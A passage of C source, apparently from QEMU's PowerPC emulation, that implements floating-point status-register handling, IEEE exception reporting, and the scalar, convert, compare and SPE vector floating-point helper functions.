|= FP_OX; /* Update the floating-point exception summary */ env->fpscr |= FP_FX; if (fpscr_oe != 0) { /* XXX: should adjust the result */ /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; /* We must update the target FPR before raising the exception */ cs->exception_index = POWERPC_EXCP_PROGRAM; env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_OX; } else { env->fpscr |= FP_XX; env->fpscr |= FP_FI; } } static inline void float_underflow_excp(CPUPPCState *env) { CPUState *cs = env_cpu(env); env->fpscr |= FP_UX; /* Update the floating-point exception summary */ env->fpscr |= FP_FX; if (fpscr_ue != 0) { /* XXX: should adjust the result */ /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; /* We must update the target FPR before raising the exception */ cs->exception_index = POWERPC_EXCP_PROGRAM; env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_UX; } } static inline void float_inexact_excp(CPUPPCState *env) { CPUState *cs = env_cpu(env); env->fpscr |= FP_FI; env->fpscr |= FP_XX; /* Update the floating-point exception summary */ env->fpscr |= FP_FX; if (fpscr_xe != 0) { /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; /* We must update the target FPR before raising the exception */ cs->exception_index = POWERPC_EXCP_PROGRAM; env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_XX; } } static inline void fpscr_set_rounding_mode(CPUPPCState *env) { int rnd_type; /* Set rounding mode */ switch (fpscr_rn) { case 0: /* Best approximation (round to nearest) */ rnd_type = float_round_nearest_even; break; case 1: /* Smaller magnitude (round toward zero) */ rnd_type = float_round_to_zero; break; case 2: /* Round toward +infinite */ rnd_type = float_round_up; break; default: 
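/* RN is a 2-bit field, so only 3 can reach here; the default label keeps rnd_type provably initialized */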
case 3: /* Round toward -infinite */ rnd_type = float_round_down; break; } set_float_rounding_mode(rnd_type, &env->fp_status); } void helper_fpscr_clrbit(CPUPPCState *env, uint32_t bit) { int prev; prev = (env->fpscr >> bit) & 1; env->fpscr &= ~(1 << bit); if (prev == 1) { switch (bit) { case FPSCR_RN1: case FPSCR_RN0: fpscr_set_rounding_mode(env); break; case FPSCR_VXSNAN: case FPSCR_VXISI: case FPSCR_VXIDI: case FPSCR_VXZDZ: case FPSCR_VXIMZ: case FPSCR_VXVC: case FPSCR_VXSOFT: case FPSCR_VXSQRT: case FPSCR_VXCVI: if (!fpscr_ix) { /* Set VX bit to zero */ env->fpscr &= ~FP_VX; } break; case FPSCR_OX: case FPSCR_UX: case FPSCR_ZX: case FPSCR_XX: case FPSCR_VE: case FPSCR_OE: case FPSCR_UE: case FPSCR_ZE: case FPSCR_XE: if (!fpscr_eex) { /* Set the FEX bit */ env->fpscr &= ~FP_FEX; } break; default: break; } } } void helper_fpscr_setbit(CPUPPCState *env, uint32_t bit) { CPUState *cs = env_cpu(env); int prev; prev = (env->fpscr >> bit) & 1; env->fpscr |= 1ULL << bit; if (prev == 0) { switch (bit) { case FPSCR_VX: env->fpscr |= FP_FX; if (fpscr_ve) { goto raise_ve; } break; case FPSCR_OX: env->fpscr |= FP_FX; if (fpscr_oe) { goto raise_oe; } break; case FPSCR_UX: env->fpscr |= FP_FX; if (fpscr_ue) { goto raise_ue; } break; case FPSCR_ZX: env->fpscr |= FP_FX; if (fpscr_ze) { goto raise_ze; } break; case FPSCR_XX: env->fpscr |= FP_FX; if (fpscr_xe) { goto raise_xe; } break; case FPSCR_VXSNAN: case FPSCR_VXISI: case FPSCR_VXIDI: case FPSCR_VXZDZ: case FPSCR_VXIMZ: case FPSCR_VXVC: case FPSCR_VXSOFT: case FPSCR_VXSQRT: case FPSCR_VXCVI: env->fpscr |= FP_VX; env->fpscr |= FP_FX; if (fpscr_ve != 0) { goto raise_ve; } break; case FPSCR_VE: if (fpscr_vx != 0) { raise_ve: env->error_code = POWERPC_EXCP_FP; if (fpscr_vxsnan) { env->error_code |= POWERPC_EXCP_FP_VXSNAN; } if (fpscr_vxisi) { env->error_code |= POWERPC_EXCP_FP_VXISI; } if (fpscr_vxidi) { env->error_code |= POWERPC_EXCP_FP_VXIDI; } if (fpscr_vxzdz) { env->error_code |= POWERPC_EXCP_FP_VXZDZ; } if (fpscr_vximz) { env->error_code |= POWERPC_EXCP_FP_VXIMZ; } if (fpscr_vxvc) { env->error_code |= POWERPC_EXCP_FP_VXVC; } if (fpscr_vxsoft) { env->error_code |= POWERPC_EXCP_FP_VXSOFT; } if (fpscr_vxsqrt) { env->error_code |= POWERPC_EXCP_FP_VXSQRT; } if (fpscr_vxcvi) { env->error_code |= POWERPC_EXCP_FP_VXCVI; } goto raise_excp; } break; case FPSCR_OE: if (fpscr_ox != 0) { raise_oe: env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_OX; goto raise_excp; } break; case FPSCR_UE: if (fpscr_ux != 0) { raise_ue: env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_UX; goto raise_excp; } break; case FPSCR_ZE: if (fpscr_zx != 0) { raise_ze: env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_ZX; goto raise_excp; } break; case FPSCR_XE: if (fpscr_xx != 0) { raise_xe: env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_XX; goto raise_excp; } break; case FPSCR_RN1: case FPSCR_RN0: fpscr_set_rounding_mode(env); break; default: break; raise_excp: /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; /* We have to update Rc1 before raising the exception */ cs->exception_index = POWERPC_EXCP_PROGRAM; break; } } } void helper_store_fpscr(CPUPPCState *env, uint64_t arg, uint32_t mask) { CPUState *cs = env_cpu(env); target_ulong prev, new; int i; prev = env->fpscr; new = (target_ulong)arg; new &= ~(FP_FEX | FP_VX); new |= prev & (FP_FEX | FP_VX); for (i = 0; i < sizeof(target_ulong) * 2; i++) { if (mask & (1 << i)) { env->fpscr &= ~(0xFLL << (4 * i)); env->fpscr |= new & (0xFLL << (4 * i)); } } /* Update VX and FEX */ if (fpscr_ix != 0) 
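/* some VX* sticky bit is set, so raise the VX summary */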
{ env->fpscr |= FP_VX; } else { env->fpscr &= ~FP_VX; } if ((fpscr_ex & fpscr_eex) != 0) { env->fpscr |= FP_FEX; cs->exception_index = POWERPC_EXCP_PROGRAM; /* XXX: we should compute it properly */ env->error_code = POWERPC_EXCP_FP; } else { env->fpscr &= ~FP_FEX; } fpscr_set_rounding_mode(env); } void store_fpscr(CPUPPCState *env, uint64_t arg, uint32_t mask) { helper_store_fpscr(env, arg, mask); } static void do_float_check_status(CPUPPCState *env, uintptr_t raddr) { CPUState *cs = env_cpu(env); int status = get_float_exception_flags(&env->fp_status); if (status & float_flag_overflow) { float_overflow_excp(env); } else if (status & float_flag_underflow) { float_underflow_excp(env); } if (status & float_flag_inexact) { float_inexact_excp(env); } else { env->fpscr &= ~FP_FI; /* clear the FPSCR[FI] bit */ } if (cs->exception_index == POWERPC_EXCP_PROGRAM && (env->error_code & POWERPC_EXCP_FP)) { /* Deferred floating-point exception after target FPR update */ if (fp_exceptions_enabled(env)) { raise_exception_err_ra(env, cs->exception_index, env->error_code, raddr); } } } void helper_float_check_status(CPUPPCState *env) { do_float_check_status(env, GETPC()); } void helper_reset_fpstatus(CPUPPCState *env) { set_float_exception_flags(0, &env->fp_status); } static void float_invalid_op_addsub(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr, int classes) { if ((classes & ~is_neg) == is_inf) { /* Magnitude subtraction of infinities */ float_invalid_op_vxisi(env, set_fpcc, retaddr); } else if (classes & is_snan) { float_invalid_op_vxsnan(env, retaddr); } } /* fadd - fadd. */ float64 helper_fadd(CPUPPCState *env, float64 arg1, float64 arg2) { float64 ret = float64_add(arg1, arg2, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status & float_flag_invalid)) { float_invalid_op_addsub(env, 1, GETPC(), float64_classify(arg1) | float64_classify(arg2)); } return ret; } /* fsub - fsub. */ float64 helper_fsub(CPUPPCState *env, float64 arg1, float64 arg2) { float64 ret = float64_sub(arg1, arg2, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status & float_flag_invalid)) { float_invalid_op_addsub(env, 1, GETPC(), float64_classify(arg1) | float64_classify(arg2)); } return ret; } static void float_invalid_op_mul(CPUPPCState *env, bool set_fprc, uintptr_t retaddr, int classes) { if ((classes & (is_zero | is_inf)) == (is_zero | is_inf)) { /* Multiplication of zero by infinity */ float_invalid_op_vximz(env, set_fprc, retaddr); } else if (classes & is_snan) { float_invalid_op_vxsnan(env, retaddr); } } /* fmul - fmul. */ float64 helper_fmul(CPUPPCState *env, float64 arg1, float64 arg2) { float64 ret = float64_mul(arg1, arg2, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status & float_flag_invalid)) { float_invalid_op_mul(env, 1, GETPC(), float64_classify(arg1) | float64_classify(arg2)); } return ret; } static void float_invalid_op_div(CPUPPCState *env, bool set_fprc, uintptr_t retaddr, int classes) { classes &= ~is_neg; if (classes == is_inf) { /* Division of infinity by infinity */ float_invalid_op_vxidi(env, set_fprc, retaddr); } else if (classes == is_zero) { /* Division of zero by zero */ float_invalid_op_vxzdz(env, set_fprc, retaddr); } else if (classes & is_snan) { float_invalid_op_vxsnan(env, retaddr); } } /* fdiv - fdiv. 
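Reports VXIDI (inf/inf), VXZDZ (0/0) and VXSNAN invalid cases, plus ZX on division by zero.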
*/ float64 helper_fdiv(CPUPPCState *env, float64 arg1, float64 arg2) { float64 ret = float64_div(arg1, arg2, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status)) { if (status & float_flag_invalid) { float_invalid_op_div(env, 1, GETPC(), float64_classify(arg1) | float64_classify(arg2)); } if (status & float_flag_divbyzero) { float_zero_divide_excp(env, GETPC()); } } return ret; } static void float_invalid_cvt(CPUPPCState *env, bool set_fprc, uintptr_t retaddr, int class1) { float_invalid_op_vxcvi(env, set_fprc, retaddr); if (class1 & is_snan) { float_invalid_op_vxsnan(env, retaddr); } } #define FPU_FCTI(op, cvt, nanval) \ uint64_t helper_##op(CPUPPCState *env, float64 arg) \ { \ uint64_t ret = float64_to_##cvt(arg, &env->fp_status); \ int status = get_float_exception_flags(&env->fp_status); \ \ if (unlikely(status)) { \ if (status & float_flag_invalid) { \ float_invalid_cvt(env, 1, GETPC(), float64_classify(arg)); \ ret = nanval; \ } \ do_float_check_status(env, GETPC()); \ } \ return ret; \ } FPU_FCTI(fctiw, int32, 0x80000000U) FPU_FCTI(fctiwz, int32_round_to_zero, 0x80000000U) FPU_FCTI(fctiwu, uint32, 0x00000000U) FPU_FCTI(fctiwuz, uint32_round_to_zero, 0x00000000U) FPU_FCTI(fctid, int64, 0x8000000000000000ULL) FPU_FCTI(fctidz, int64_round_to_zero, 0x8000000000000000ULL) FPU_FCTI(fctidu, uint64, 0x0000000000000000ULL) FPU_FCTI(fctiduz, uint64_round_to_zero, 0x0000000000000000ULL) #define FPU_FCFI(op, cvtr, is_single) \ uint64_t helper_##op(CPUPPCState *env, uint64_t arg) \ { \ CPU_DoubleU farg; \ \ if (is_single) { \ float32 tmp = cvtr(arg, &env->fp_status); \ farg.d = float32_to_float64(tmp, &env->fp_status); \ } else { \ farg.d = cvtr(arg, &env->fp_status); \ } \ do_float_check_status(env, GETPC()); \ return farg.ll; \ } FPU_FCFI(fcfid, int64_to_float64, 0) FPU_FCFI(fcfids, int64_to_float32, 1) FPU_FCFI(fcfidu, uint64_to_float64, 0) FPU_FCFI(fcfidus, uint64_to_float32, 1) static inline uint64_t do_fri(CPUPPCState *env, uint64_t arg, int rounding_mode) { CPU_DoubleU farg; farg.ll = arg; if (unlikely(float64_is_signaling_nan(farg.d, &env->fp_status))) { /* sNaN round */ float_invalid_op_vxsnan(env, GETPC()); farg.ll = arg | 0x0008000000000000ULL; } else { int inexact = get_float_exception_flags(&env->fp_status) & float_flag_inexact; set_float_rounding_mode(rounding_mode, &env->fp_status); farg.ll = float64_round_to_int(farg.d, &env->fp_status); /* Restore rounding mode from FPSCR */ fpscr_set_rounding_mode(env); /* fri* does not set FPSCR[XX] */ if (!inexact) { env->fp_status.float_exception_flags &= ~float_flag_inexact; } } do_float_check_status(env, GETPC()); return farg.ll; } uint64_t helper_frin(CPUPPCState *env, uint64_t arg) { return do_fri(env, arg, float_round_ties_away); } uint64_t helper_friz(CPUPPCState *env, uint64_t arg) { return do_fri(env, arg, float_round_to_zero); } uint64_t helper_frip(CPUPPCState *env, uint64_t arg) { return do_fri(env, arg, float_round_up); } uint64_t helper_frim(CPUPPCState *env, uint64_t arg) { return do_fri(env, arg, float_round_down); } #define FPU_MADDSUB_UPDATE(NAME, TP) \ static void NAME(CPUPPCState *env, TP arg1, TP arg2, TP arg3, \ unsigned int madd_flags, uintptr_t retaddr) \ { \ if (TP##_is_signaling_nan(arg1, &env->fp_status) || \ TP##_is_signaling_nan(arg2, &env->fp_status) || \ TP##_is_signaling_nan(arg3, &env->fp_status)) { \ /* sNaN operation */ \ float_invalid_op_vxsnan(env, retaddr); \ } \ if ((TP##_is_infinity(arg1) && TP##_is_zero(arg2)) || \ (TP##_is_zero(arg1) && 
TP##_is_infinity(arg2))) { \ /* Multiplication of zero by infinity */ \ float_invalid_op_vximz(env, 1, retaddr); \ } \ if ((TP##_is_infinity(arg1) || TP##_is_infinity(arg2)) && \ TP##_is_infinity(arg3)) { \ uint8_t aSign, bSign, cSign; \ \ aSign = TP##_is_neg(arg1); \ bSign = TP##_is_neg(arg2); \ cSign = TP##_is_neg(arg3); \ if (madd_flags & float_muladd_negate_c) { \ cSign ^= 1; \ } \ if (aSign ^ bSign ^ cSign) { \ float_invalid_op_vxisi(env, 1, retaddr); \ } \ } \ } FPU_MADDSUB_UPDATE(float32_maddsub_update_excp, float32) FPU_MADDSUB_UPDATE(float64_maddsub_update_excp, float64) #define FPU_FMADD(op, madd_flags) \ uint64_t helper_##op(CPUPPCState *env, uint64_t arg1, \ uint64_t arg2, uint64_t arg3) \ { \ uint32_t flags; \ float64 ret = float64_muladd(arg1, arg2, arg3, madd_flags, \ &env->fp_status); \ flags = get_float_exception_flags(&env->fp_status); \ if (flags) { \ if (flags & float_flag_invalid) { \ float64_maddsub_update_excp(env, arg1, arg2, arg3, \ madd_flags, GETPC()); \ } \ do_float_check_status(env, GETPC()); \ } \ return ret; \ } #define MADD_FLGS 0 #define MSUB_FLGS float_muladd_negate_c #define NMADD_FLGS float_muladd_negate_result #define NMSUB_FLGS (float_muladd_negate_c | float_muladd_negate_result) FPU_FMADD(fmadd, MADD_FLGS) FPU_FMADD(fnmadd, NMADD_FLGS) FPU_FMADD(fmsub, MSUB_FLGS) FPU_FMADD(fnmsub, NMSUB_FLGS) /* frsp - frsp. */ uint64_t helper_frsp(CPUPPCState *env, uint64_t arg) { CPU_DoubleU farg; float32 f32; farg.ll = arg; if (unlikely(float64_is_signaling_nan(farg.d, &env->fp_status))) { float_invalid_op_vxsnan(env, GETPC()); } f32 = float64_to_float32(farg.d, &env->fp_status); farg.d = float32_to_float64(f32, &env->fp_status); return farg.ll; } /* fsqrt - fsqrt. */ float64 helper_fsqrt(CPUPPCState *env, float64 arg) { float64 ret = float64_sqrt(arg, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status & float_flag_invalid)) { if (unlikely(float64_is_any_nan(arg))) { if (unlikely(float64_is_signaling_nan(arg, &env->fp_status))) { /* sNaN square root */ float_invalid_op_vxsnan(env, GETPC()); } } else { /* Square root of a negative nonzero number */ float_invalid_op_vxsqrt(env, 1, GETPC()); } } return ret; } /* fre - fre. */ float64 helper_fre(CPUPPCState *env, float64 arg) { /* "Estimate" the reciprocal with actual division. */ float64 ret = float64_div(float64_one, arg, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status)) { if (status & float_flag_invalid) { if (float64_is_signaling_nan(arg, &env->fp_status)) { /* sNaN reciprocal */ float_invalid_op_vxsnan(env, GETPC()); } } if (status & float_flag_divbyzero) { float_zero_divide_excp(env, GETPC()); /* For FPSCR.ZE == 0, the result is 1/2. */ ret = float64_set_sign(float64_half, float64_is_neg(arg)); } } return ret; } /* fres - fres. */ uint64_t helper_fres(CPUPPCState *env, uint64_t arg) { CPU_DoubleU farg; float32 f32; farg.ll = arg; if (unlikely(float64_is_signaling_nan(farg.d, &env->fp_status))) { /* sNaN reciprocal */ float_invalid_op_vxsnan(env, GETPC()); } farg.d = float64_div(float64_one, farg.d, &env->fp_status); f32 = float64_to_float32(farg.d, &env->fp_status); farg.d = float32_to_float64(f32, &env->fp_status); return farg.ll; } /* frsqrte - frsqrte. */ float64 helper_frsqrte(CPUPPCState *env, float64 arg) { /* "Estimate" the reciprocal with actual division. 
*/ float64 rets = float64_sqrt(arg, &env->fp_status); float64 retd = float64_div(float64_one, rets, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status)) { if (status & float_flag_invalid) { if (float64_is_signaling_nan(arg, &env->fp_status)) { /* sNaN reciprocal */ float_invalid_op_vxsnan(env, GETPC()); } else { /* Square root of a negative nonzero number */ float_invalid_op_vxsqrt(env, 1, GETPC()); } } if (status & float_flag_divbyzero) { /* Reciprocal of (square root of) zero. */ float_zero_divide_excp(env, GETPC()); } } return retd; } /* fsel - fsel. */ uint64_t helper_fsel(CPUPPCState *env, uint64_t arg1, uint64_t arg2, uint64_t arg3) { CPU_DoubleU farg1; farg1.ll = arg1; if ((!float64_is_neg(farg1.d) || float64_is_zero(farg1.d)) && !float64_is_any_nan(farg1.d)) { return arg2; } else { return arg3; } } uint32_t helper_ftdiv(uint64_t fra, uint64_t frb) { int fe_flag = 0; int fg_flag = 0; if (unlikely(float64_is_infinity(fra) || float64_is_infinity(frb) || float64_is_zero(frb))) { fe_flag = 1; fg_flag = 1; } else { int e_a = ppc_float64_get_unbiased_exp(fra); int e_b = ppc_float64_get_unbiased_exp(frb); if (unlikely(float64_is_any_nan(fra) || float64_is_any_nan(frb))) { fe_flag = 1; } else if ((e_b <= -1022) || (e_b >= 1021)) { fe_flag = 1; } else if (!float64_is_zero(fra) && (((e_a - e_b) >= 1023) || ((e_a - e_b) <= -1021) || (e_a <= -970))) { fe_flag = 1; } if (unlikely(float64_is_zero_or_denormal(frb))) { /* XB is not zero because of the above check and */ /* so must be denormalized. */ fg_flag = 1; } } return 0x8 | (fg_flag ? 4 : 0) | (fe_flag ? 2 : 0); } uint32_t helper_ftsqrt(uint64_t frb) { int fe_flag = 0; int fg_flag = 0; if (unlikely(float64_is_infinity(frb) || float64_is_zero(frb))) { fe_flag = 1; fg_flag = 1; } else { int e_b = ppc_float64_get_unbiased_exp(frb); if (unlikely(float64_is_any_nan(frb))) { fe_flag = 1; } else if (unlikely(float64_is_zero(frb))) { fe_flag = 1; } else if (unlikely(float64_is_neg(frb))) { fe_flag = 1; } else if (!float64_is_zero(frb) && (e_b <= (-1022 + 52))) { fe_flag = 1; } if (unlikely(float64_is_zero_or_denormal(frb))) { /* XB is not zero because of the above check and */ /* therefore must be denormalized. */ fg_flag = 1; } } return 0x8 | (fg_flag ? 4 : 0) | (fe_flag ? 
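/*
 * (Illustrative note: the nibble returned here mirrors helper_ftdiv
 * above: 0x8 is always set, fg_flag contributes the FG bit (0x4,
 * operand zero/infinite or denormal) and fe_flag the FE bit (0x2,
 * the estimate could be inexact or invalid).  E.g. frb = +0.0 sets
 * both flags and yields 0xE.)
 */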
2 : 0); } void helper_fcmpu(CPUPPCState *env, uint64_t arg1, uint64_t arg2, uint32_t crfD) { CPU_DoubleU farg1, farg2; uint32_t ret = 0; farg1.ll = arg1; farg2.ll = arg2; if (unlikely(float64_is_any_nan(farg1.d) || float64_is_any_nan(farg2.d))) { ret = 0x01UL; } else if (float64_lt(farg1.d, farg2.d, &env->fp_status)) { ret = 0x08UL; } else if (!float64_le(farg1.d, farg2.d, &env->fp_status)) { ret = 0x04UL; } else { ret = 0x02UL; } env->fpscr &= ~FP_FPCC; env->fpscr |= ret << FPSCR_FPCC; env->crf[crfD] = ret; if (unlikely(ret == 0x01UL && (float64_is_signaling_nan(farg1.d, &env->fp_status) || float64_is_signaling_nan(farg2.d, &env->fp_status)))) { /* sNaN comparison */ float_invalid_op_vxsnan(env, GETPC()); } } void helper_fcmpo(CPUPPCState *env, uint64_t arg1, uint64_t arg2, uint32_t crfD) { CPU_DoubleU farg1, farg2; uint32_t ret = 0; farg1.ll = arg1; farg2.ll = arg2; if (unlikely(float64_is_any_nan(farg1.d) || float64_is_any_nan(farg2.d))) { ret = 0x01UL; } else if (float64_lt(farg1.d, farg2.d, &env->fp_status)) { ret = 0x08UL; } else if (!float64_le(farg1.d, farg2.d, &env->fp_status)) { ret = 0x04UL; } else { ret = 0x02UL; } env->fpscr &= ~FP_FPCC; env->fpscr |= ret << FPSCR_FPCC; env->crf[crfD] = (uint32_t) ret; if (unlikely(ret == 0x01UL)) { float_invalid_op_vxvc(env, 1, GETPC()); if (float64_is_signaling_nan(farg1.d, &env->fp_status) || float64_is_signaling_nan(farg2.d, &env->fp_status)) { /* sNaN comparison */ float_invalid_op_vxsnan(env, GETPC()); } } } /* Single-precision floating-point conversions */ static inline uint32_t efscfsi(CPUPPCState *env, uint32_t val) { CPU_FloatU u; u.f = int32_to_float32(val, &env->vec_status); return u.l; } static inline uint32_t efscfui(CPUPPCState *env, uint32_t val) { CPU_FloatU u; u.f = uint32_to_float32(val, &env->vec_status); return u.l; } static inline int32_t efsctsi(CPUPPCState *env, uint32_t val) { CPU_FloatU u; u.l = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float32_is_quiet_nan(u.f, &env->vec_status))) { return 0; } return float32_to_int32(u.f, &env->vec_status); } static inline uint32_t efsctui(CPUPPCState *env, uint32_t val) { CPU_FloatU u; u.l = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float32_is_quiet_nan(u.f, &env->vec_status))) { return 0; } return float32_to_uint32(u.f, &env->vec_status); } static inline uint32_t efsctsiz(CPUPPCState *env, uint32_t val) { CPU_FloatU u; u.l = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float32_is_quiet_nan(u.f, &env->vec_status))) { return 0; } return float32_to_int32_round_to_zero(u.f, &env->vec_status); } static inline uint32_t efsctuiz(CPUPPCState *env, uint32_t val) { CPU_FloatU u; u.l = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float32_is_quiet_nan(u.f, &env->vec_status))) { return 0; } return float32_to_uint32_round_to_zero(u.f, &env->vec_status); } static inline uint32_t efscfsf(CPUPPCState *env, uint32_t val) { CPU_FloatU u; float32 tmp; u.f = int32_to_float32(val, &env->vec_status); tmp = int64_to_float32(1ULL << 32, &env->vec_status); u.f = float32_div(u.f, tmp, &env->vec_status); return u.l; } static inline uint32_t efscfuf(CPUPPCState *env, uint32_t val) { CPU_FloatU u; float32 tmp; u.f = uint32_to_float32(val, &env->vec_status); tmp = uint64_to_float32(1ULL << 32, &env->vec_status); u.f = float32_div(u.f, tmp, &env->vec_status); return u.l; } static inline uint32_t efsctsf(CPUPPCState *env, uint32_t val) { CPU_FloatU u; float32 tmp; u.l = val; /* NaN are not treated the 
same way IEEE 754 does */ if (unlikely(float32_is_quiet_nan(u.f, &env->vec_status))) { return 0; } tmp = uint64_to_float32(1ULL << 32, &env->vec_status); u.f = float32_mul(u.f, tmp, &env->vec_status); return float32_to_int32(u.f, &env->vec_status); } static inline uint32_t efsctuf(CPUPPCState *env, uint32_t val) { CPU_FloatU u; float32 tmp; u.l = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float32_is_quiet_nan(u.f, &env->vec_status))) { return 0; } tmp = uint64_to_float32(1ULL << 32, &env->vec_status); u.f = float32_mul(u.f, tmp, &env->vec_status); return float32_to_uint32(u.f, &env->vec_status); } #define HELPER_SPE_SINGLE_CONV(name) \ uint32_t helper_e##name(CPUPPCState *env, uint32_t val) \ { \ return e##name(env, val); \ } /* efscfsi */ HELPER_SPE_SINGLE_CONV(fscfsi); /* efscfui */ HELPER_SPE_SINGLE_CONV(fscfui); /* efscfuf */ HELPER_SPE_SINGLE_CONV(fscfuf); /* efscfsf */ HELPER_SPE_SINGLE_CONV(fscfsf); /* efsctsi */ HELPER_SPE_SINGLE_CONV(fsctsi); /* efsctui */ HELPER_SPE_SINGLE_CONV(fsctui); /* efsctsiz */ HELPER_SPE_SINGLE_CONV(fsctsiz); /* efsctuiz */ HELPER_SPE_SINGLE_CONV(fsctuiz); /* efsctsf */ HELPER_SPE_SINGLE_CONV(fsctsf); /* efsctuf */ HELPER_SPE_SINGLE_CONV(fsctuf); #define HELPER_SPE_VECTOR_CONV(name) \ uint64_t helper_ev##name(CPUPPCState *env, uint64_t val) \ { \ return ((uint64_t)e##name(env, val >> 32) << 32) | \ (uint64_t)e##name(env, val); \ } /* evfscfsi */ HELPER_SPE_VECTOR_CONV(fscfsi); /* evfscfui */ HELPER_SPE_VECTOR_CONV(fscfui); /* evfscfuf */ HELPER_SPE_VECTOR_CONV(fscfuf); /* evfscfsf */ HELPER_SPE_VECTOR_CONV(fscfsf); /* evfsctsi */ HELPER_SPE_VECTOR_CONV(fsctsi); /* evfsctui */ HELPER_SPE_VECTOR_CONV(fsctui); /* evfsctsiz */ HELPER_SPE_VECTOR_CONV(fsctsiz); /* evfsctuiz */ HELPER_SPE_VECTOR_CONV(fsctuiz); /* evfsctsf */ HELPER_SPE_VECTOR_CONV(fsctsf); /* evfsctuf */ HELPER_SPE_VECTOR_CONV(fsctuf); /* Single-precision floating-point arithmetic */ static inline uint32_t efsadd(CPUPPCState *env, uint32_t op1, uint32_t op2) { CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; u1.f = float32_add(u1.f, u2.f, &env->vec_status); return u1.l; } static inline uint32_t efssub(CPUPPCState *env, uint32_t op1, uint32_t op2) { CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; u1.f = float32_sub(u1.f, u2.f, &env->vec_status); return u1.l; } static inline uint32_t efsmul(CPUPPCState *env, uint32_t op1, uint32_t op2) { CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; u1.f = float32_mul(u1.f, u2.f, &env->vec_status); return u1.l; } static inline uint32_t efsdiv(CPUPPCState *env, uint32_t op1, uint32_t op2) { CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; u1.f = float32_div(u1.f, u2.f, &env->vec_status); return u1.l; } #define HELPER_SPE_SINGLE_ARITH(name) \ uint32_t helper_e##name(CPUPPCState *env, uint32_t op1, uint32_t op2) \ { \ return e##name(env, op1, op2); \ } /* efsadd */ HELPER_SPE_SINGLE_ARITH(fsadd); /* efssub */ HELPER_SPE_SINGLE_ARITH(fssub); /* efsmul */ HELPER_SPE_SINGLE_ARITH(fsmul); /* efsdiv */ HELPER_SPE_SINGLE_ARITH(fsdiv); #define HELPER_SPE_VECTOR_ARITH(name) \ uint64_t helper_ev##name(CPUPPCState *env, uint64_t op1, uint64_t op2) \ { \ return ((uint64_t)e##name(env, op1 >> 32, op2 >> 32) << 32) | \ (uint64_t)e##name(env, op1, op2); \ } /* evfsadd */ HELPER_SPE_VECTOR_ARITH(fsadd); /* evfssub */ HELPER_SPE_VECTOR_ARITH(fssub); /* evfsmul */ HELPER_SPE_VECTOR_ARITH(fsmul); /* evfsdiv */ HELPER_SPE_VECTOR_ARITH(fsdiv); /* Single-precision floating-point comparisons */ static inline uint32_t efscmplt(CPUPPCState *env, uint32_t op1, uint32_t op2) { 
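/*
 * The SPE scalar compares (efscmplt/efscmpgt/efscmpeq) reduce to a
 * single CR bit: 4 when the relation holds, 0 otherwise; evcmp_merge()
 * further down packs two such lane results into the full 4-bit CR
 * field for the ev* vector forms.  As a sketch with raw float32
 * encodings: op1 = 0x3f800000 (1.0f), op2 = 0x40000000 (2.0f) gives
 * efscmplt == 4 and efscmpgt == 0.
 */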
CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; return float32_lt(u1.f, u2.f, &env->vec_status) ? 4 : 0; } static inline uint32_t efscmpgt(CPUPPCState *env, uint32_t op1, uint32_t op2) { CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; return float32_le(u1.f, u2.f, &env->vec_status) ? 0 : 4; } static inline uint32_t efscmpeq(CPUPPCState *env, uint32_t op1, uint32_t op2) { CPU_FloatU u1, u2; u1.l = op1; u2.l = op2; return float32_eq(u1.f, u2.f, &env->vec_status) ? 4 : 0; } static inline uint32_t efststlt(CPUPPCState *env, uint32_t op1, uint32_t op2) { /* XXX: TODO: ignore special values (NaN, infinites, ...) */ return efscmplt(env, op1, op2); } static inline uint32_t efststgt(CPUPPCState *env, uint32_t op1, uint32_t op2) { /* XXX: TODO: ignore special values (NaN, infinites, ...) */ return efscmpgt(env, op1, op2); } static inline uint32_t efststeq(CPUPPCState *env, uint32_t op1, uint32_t op2) { /* XXX: TODO: ignore special values (NaN, infinites, ...) */ return efscmpeq(env, op1, op2); } #define HELPER_SINGLE_SPE_CMP(name) \ uint32_t helper_e##name(CPUPPCState *env, uint32_t op1, uint32_t op2) \ { \ return e##name(env, op1, op2); \ } /* efststlt */ HELPER_SINGLE_SPE_CMP(fststlt); /* efststgt */ HELPER_SINGLE_SPE_CMP(fststgt); /* efststeq */ HELPER_SINGLE_SPE_CMP(fststeq); /* efscmplt */ HELPER_SINGLE_SPE_CMP(fscmplt); /* efscmpgt */ HELPER_SINGLE_SPE_CMP(fscmpgt); /* efscmpeq */ HELPER_SINGLE_SPE_CMP(fscmpeq); static inline uint32_t evcmp_merge(int t0, int t1) { return (t0 << 3) | (t1 << 2) | ((t0 | t1) << 1) | (t0 & t1); } #define HELPER_VECTOR_SPE_CMP(name) \ uint32_t helper_ev##name(CPUPPCState *env, uint64_t op1, uint64_t op2) \ { \ return evcmp_merge(e##name(env, op1 >> 32, op2 >> 